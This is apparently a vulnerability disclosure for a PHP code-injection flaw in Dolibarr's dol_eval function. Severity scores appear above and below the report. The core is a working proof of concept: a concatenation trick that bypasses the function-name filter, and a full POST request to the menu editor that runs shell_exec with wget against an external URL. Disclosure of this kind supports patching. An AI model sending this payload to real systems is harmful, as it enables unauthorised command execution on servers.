8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.002 Low
EPSS
Percentile
57.9%
Improper php function sanitization, lead to an ability to inject arbitrary PHP code and run arbitrary commands on file system.
In the function “dol_eval” in file “dolibarr/htdocs/core/lib/functions.lib.php” dangerous PHP functions are sanitized using “str_replace” and can be bypassed using following code in $s parameter
('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')
User with rights to add menus to the system can exploit this vulnerabilty with the following request
POST /htdocs/admin/menus/edit.php?action=add&token=84da28fc90b6abc2238f2e0da2e5ee10&menuId=0 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Referer: http://192.168.255.78/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
Cookie: <COOKIE>
Upgrade-Insecure-Requests: 1
token=84da28fc90b6abc2238f2e0da2e5ee10&menu_handler=all&user=2&type=top&propertymainmenu=testtest&titre=testtest&url=testtest&langs=&position=100&target=&enabled=1&perms=%28%27she%27.%27ll_%27.%27ex%27.%27ec%27%29%28%27wget+https%3A%2F%2F<REDACTED>%27%29&save=Save
This vulnerability is capable of run arbitrary commands in the file system
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.002 Low
EPSS
Percentile
57.9%